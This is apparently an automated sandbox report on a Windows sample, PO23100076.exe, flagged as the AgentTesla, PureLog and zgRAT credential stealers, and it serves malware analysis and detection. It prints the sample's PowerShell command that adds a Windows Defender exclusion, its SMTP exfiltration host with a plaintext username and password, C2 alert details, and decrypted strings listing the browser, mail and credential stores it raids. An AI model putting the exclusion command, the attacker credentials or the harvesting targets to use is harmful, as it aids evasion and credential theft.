Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO23100076.exe

Overview

General Information

Sample name:PO23100076.exe
Analysis ID:1586625
MD5:abef12c0ec6c52759f2cd9cc5402e593
SHA1:5f8d0e0b219578e9bf15ebb85b36de1d3d951e6f
SHA256:5b2d21f50ea195e247b45b8330c18acfd0f71e146fe40489ee8301c7045daf04
Tags:exeuser-TeamDreier
Infos:

Detection

AgentTesla, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • PO23100076.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\PO23100076.exe" MD5: ABEF12C0EC6C52759F2CD9CC5402E593)
    • powershell.exe (PID: 6800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4944 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • PO23100076.exe (PID: 4644 cmdline: "C:\Users\user\Desktop\PO23100076.exe" MD5: ABEF12C0EC6C52759F2CD9CC5402E593)
    • PO23100076.exe (PID: 3876 cmdline: "C:\Users\user\Desktop\PO23100076.exe" MD5: ABEF12C0EC6C52759F2CD9CC5402E593)
    • PO23100076.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\PO23100076.exe" MD5: ABEF12C0EC6C52759F2CD9CC5402E593)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
SourceRuleDescriptionAuthorStrings
00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000008.00000002.2487084327.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000008.00000002.2489325941.0000000002A21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            0.2.PO23100076.exe.35f88d8.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              8.2.PO23100076.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.PO23100076.exe.67b0000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.PO23100076.exe.37f7348.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.PO23100076.exe.67b0000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 5 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100076.exe", ParentImage: C:\Users\user\Desktop\PO23100076.exe, ParentProcessId: 5392, ParentProcessName: PO23100076.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", ProcessId: 6800, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100076.exe", ParentImage: C:\Users\user\Desktop\PO23100076.exe, ParentProcessId: 5392, ParentProcessName: PO23100076.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", ProcessId: 6800, ProcessName: powershell.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PO23100076.exe, Initiated: true, ProcessId: 6936, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49702
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO23100076.exe", ParentImage: C:\Users\user\Desktop\PO23100076.exe, ParentProcessId: 5392, ParentProcessName: PO23100076.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe", ProcessId: 6800, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-09T12:40:55.696232+010020301711A Network Trojan was detected192.168.2.749702199.79.62.115587TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-09T12:40:55.696232+010028397231Malware Command and Control Activity Detected192.168.2.749702199.79.62.115587TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: PO23100076.exeAvira: detected
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                      Source: PO23100076.exeReversingLabs: Detection: 44%
                      Source: PO23100076.exeVirustotal: Detection: 47%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: PO23100076.exeJoe Sandbox ML: detected
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: /log.tmp
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>[
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ]<br>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Time:
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>User Name:
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>Computer Name:
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>OSFullName:
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>CPU:
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>RAM:
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: IP Address:
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <hr>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: New
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: IP Address:
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: mail.mbarieservicesltd.com
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: saless@mbarieservicesltd.com
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: *o9H+18Q4%;M
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: iinfo@mbarieservicesltd.com
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: false
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: appdata
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: KTvkzEc
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: KTvkzEc.exe
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: KTvkzEc
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Type
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <hr>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <b>[
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ]</b> (
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: )<br>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {BACK}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {ALT+TAB}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {ALT+F4}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {TAB}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {ESC}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {Win}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {CAPSLOCK}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {KEYUP}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {KEYDOWN}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {KEYLEFT}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {KEYRIGHT}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {DEL}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {END}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {HOME}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {Insert}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {NumLock}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {PageDown}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {PageUp}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {ENTER}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F1}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F2}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F3}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F4}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F5}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F6}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F7}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F8}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F9}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F10}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F11}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {F12}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: control
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {CTRL}
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: &amp;
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: &lt;
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: &gt;
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: &quot;
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <hr>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: logins
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: IE/Edge
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Windows Secure Note
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Windows Web Password Credential
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Windows Credential Picker Protector
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Web Credentials
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Windows Credentials
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Windows Domain Certificate Credential
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Windows Domain Password Credential
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Windows Extended Credential
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SchemaId
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: pResourceElement
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: pIdentityElement
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: pPackageSid
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: pAuthenticatorElement
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: IE/Edge
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UC Browser
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: UCBrowser\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Login Data
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: journal
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: wow_logins
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Safari for Windows
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <array>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <dict>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <string>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </string>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <string>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </string>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: <data>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: </data>
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: -convert xml1 -s -o "
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \fixed_keychain.xml"
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Microsoft\Credentials\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Microsoft\Protect\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: credential
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: QQ Browser
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Default\EncryptedStorage
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Profile
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \EncryptedStorage
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: entries
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: category
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: str3
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: str2
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: blob0
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: password_value
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: IncrediMail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: PopPassword
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SmtpPassword
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\IncrediMail\Identities\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Accounts_New
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: PopPassword
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SmtpPassword
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SmtpServer
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: EmailAddress
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Eudora
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: current
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Settings
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: SavePasswordText
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Settings
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ReturnAddress
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Falkon Browser
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \falkon\profiles\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: profiles.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: profiles.ini
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \browsedata.db
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: autofill
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ClawsMail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Claws-mail
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \clawsrc
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \clawsrc
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: passkey0
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: master_passphrase_salt=(.+)
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \accountrc
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: smtp_server
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: address
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: account
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \passwordstorerc
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: {(.*),(.*)}(.*)
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Flock Browser
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Flock\Browser\
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: signons3.txt
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: DynDns
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ALLUSERSPROFILE
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: username=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: password=
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: https://account.dyn.com/
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: t6KzXhCh
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: ALLUSERSPROFILE
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: global
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: accounts
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: account.
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: username
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: account.
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Psi/Psi+
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: name
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: password
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: Psi/Psi+
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Psi\profiles
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: APPDATA
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \Psi+\profiles
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \accounts.xml
                      Source: 0.2.PO23100076.exe.37f7348.1.raw.unpackString decryptor: \accounts.xml
